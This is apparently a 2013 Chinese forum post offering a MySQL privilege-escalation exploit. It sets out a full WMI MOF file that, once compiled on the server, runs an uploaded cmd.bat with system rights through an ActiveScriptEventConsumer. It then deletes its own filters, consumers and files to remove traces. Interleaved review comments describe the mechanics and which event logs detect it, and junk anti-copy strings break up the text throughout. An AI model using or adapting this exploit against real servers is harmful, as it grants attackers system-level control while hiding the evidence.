标题:
Mysql 提权即时无错Mof exp
作者:
admin
时间:
2013-2-14 00:05
标题:
Mysql 提权即时无错Mof exp
这个 MySQL 提权 MOF 只能运行 system 目录下的文件，不能指定路径。
; s/ a1 l$ I' F3 ]) {
需要把要运行的命令写入 bat 文件，上传到 system32 目录，然后执行。
a% V2 U/ _8 x2 D
3 l9 H; z- _- v3 }1 k5 `/ R" Y
这个 MySQL 提权 MOF 只能运行 system 目录下的文件，不能指定路径。
. E; O) T3 }! h# Y4 C" N9 C
需要把要运行的命令写入 bat 文件，上传到 system32 目录，然后执行。
* e2 r$ Z. _3 X$ ^/ o D
* a4 o5 M) T: C2 b
// NOTE(review): compiling this MOF registers a *permanent* WMI event subscription in
// root\cimv2: an __EventFilter, an ActiveScriptEventConsumer and a
// __FilterToConsumerBinding, plus a trigger class (MyClass547). Creation of these objects
// is recorded by the Microsoft-Windows-WMI-Activity/Operational log (event 5861) and by
// Sysmon events 19/20/21. The consumer scripts below delete their own files under
// wbem\mof, so detection should rely on those event logs rather than on disk artifacts.
#pragma
# t- ~9 o3 }( c
namespace("\\\\.\\root\\cimv2")
: H! G; r" e9 L1 s% ?# S! R
// Trigger class: creating an instance of it (see $MyClass at the end) is what fires $Filt.
class
) @, \5 z# y I3 ^5 e
MyClass547
1 T s8 ?! j$ k7 {' q# b. a6 _. f2 d
{ [key]
3 p1 K4 N, D; j1 E7 w
string
# P- e$ d J- F
Name;
$ O- m+ m/ a& o7 g2 u7 @
};
+ c8 C3 J' Y& _! v* r
// Declares the ActiveScriptEventConsumer class in this namespace and registers its
// provider ($P) by CLSID — presumably because the class is not pre-registered in
// root\cimv2; verify on the target OS version.
class
0 w4 y/ y+ p! Q0 n2 {# _
ActiveScriptEventConsumer
* m8 ^, h1 Q9 _/ |& w8 W. Q. c
: __EventConsumer { [key]
6 c( i& s6 q% y
string
8 ]! r9 ?- l/ Y7 _
Name; [not_null]
2 b7 _) o9 _' L) _" D: Z
string
# i7 k! o, R+ |6 C' c. ^/ G, d6 W& o
ScriptingEngine; string
0 a$ E9 B0 N, G! B4 ?- ?
ScriptFileName; [template]
: ? T2 n0 Y) K; t) ^8 ?
string
0 W' c; J: k2 y# w, B, I+ A+ L8 m
ScriptText; uint32 KillTimeout;
. ~3 P9 ]" B# ?* Y; l1 n
}; instance of __Win32Provider as $P {
, J+ n: `1 u7 s6 B* e5 N& x8 Q
Name
0 ~; H7 u8 [ j
=
1 g# k3 d5 D, }6 U
"ActiveScriptEventConsumer"; CLSID =
# }0 o. C' r7 K4 J* }) \5 ?
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
; C: O- A, N( ]2 H: m% K
PerUserInitialization
2 U2 k9 }1 n4 h6 B F, ?
= TRUE;
7 X9 r! H0 Y7 Y, ?+ y/ {
}; instance of __EventConsumerProviderRegistration { Provider
9 s$ ] @' { z( U; `9 u0 n
= $P; ConsumerClassNames
; R2 O# X7 [" C& C
=
, K% P( E4 ~+ k5 d! }/ L% y( G
{"ActiveScriptEventConsumer"};
7 ~) O3 u' h" n8 B' v' h
};
7 @1 t$ f/ P j4 p( Y( U! m8 ^
// Consumer "ASEC": its JScript runs "cmd.bat" (no path given) via Wscript.Shell, then
// deletes the MyClass547 class, the "instfilt" filter and this consumer. Neither script
// deletes the __FilterToConsumerBinding instances — they presumably remain in the
// repository as a forensic artifact; verify.
Instance of ActiveScriptEventConsumer
0 {$ c# `( U9 E1 G S
as $cons { Name
6 a2 b& D2 ~3 z P' v# p( {
=
. W9 f- E- `& Z: f: S' f' W {# M
"ASEC"; ScriptingEngine
4 s' k# E& y1 S b: O
=
$ S8 O" g2 B: {; h
"JScript"; ScriptText
4 P& r) s- M0 ~
=
+ o2 b( {% A4 C2 `: J
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
l4 S# k' t5 v! M' z- y5 j1 Q
// Consumer "qndASEC": cleanup script — deletes the dropped MOF
// (wbem\mof\good\hBsBa.mof), cmd.bat, the "qndfilt" filter and this consumer.
Instance of ActiveScriptEventConsumer
* S) T ?2 w& i6 o! I3 R3 q
as $cons2 { Name
0 Y p: B+ X+ V: s
=
; e3 h+ v' C1 I! h
"qndASEC"; ScriptingEngine
9 ]+ ^; X% j# S3 o, u7 ]' f
=
( ], X+ {5 _0 o& g
"JScript"; ScriptText
% U- \7 W8 z9 J# R4 h# h
=
% R* P6 b. R/ U: w1 W% m
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
' D$ [* @/ E: Z2 \9 a$ W
// Filter "instfilt": fires on creation of any MyClass547 instance.
}; instance of __EventFilter as $Filt { Name
( X/ ]) `! v/ h' k/ X' E# U
=
8 g0 K5 P ?3 H& }& i
"instfilt"; Query
& a8 D n1 t7 h& x) l
=
4 y v. j' ?: S+ o0 v& l m
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
8 e; w& O& Z! A5 Z' i- A
=
7 d+ }4 t, k# T
// Closes $Filt and opens $Filt2 "qndfilt": polls every 1 s for a Win32_Process named
// "cmd.bat" being deleted (i.e. exiting). NOTE(review): Win32_Process.Name is the host
// image name, so this condition may never match for a batch file — if so the cleanup
// pair never fires and the MOF, cmd.bat and the qnd* objects remain as forensic
// artifacts; verify.
"WQL"; }; instance of __EventFilter as $Filt2 { Name
! g. ^' }" k( f1 G, Y
=
7 {# k5 a3 s! }2 f4 D$ q( I+ Q
"qndfilt"; Query
- Q6 V, z" t9 f+ L, C' L; o) D
=
3 o+ I* _/ _/ f- o
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
# t. w0 ]0 m0 L% n' r8 W
=
5 e% T3 c. h T/ f$ Y
// Bindings: $bind joins ASEC to instfilt, $bind2 joins qndASEC to qndfilt.
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
( U3 K- ~; ?6 F u" x: H- ?" A
= $cons; Filter
5 P& _( N( Y e* Q1 \6 ?
= $Filt;
$ |, y9 [+ u( \
}; instance of __FilterToConsumerBinding as $bind2 { Consumer
, u& }& h' T% k* r: l3 Q! J
= $cons2; Filter
0 f" ]! n4 }7 r% G
= $Filt2;
, S2 @4 r, E2 A9 [3 I( p
// Creating this MyClass547 instance is the trigger: it satisfies $Filt as soon as the
// MOF is compiled, so the ASEC consumer runs immediately.
}; instance of MyClass547
c( p! U# r- K1 l! D! Y
as $MyClass { Name
6 M( s: f; I$ F
=
) S5 i8 _; F0 @2 ^* u5 @; y# g
"ClassConsumer";
n4 G! N; D3 h, o2 d
};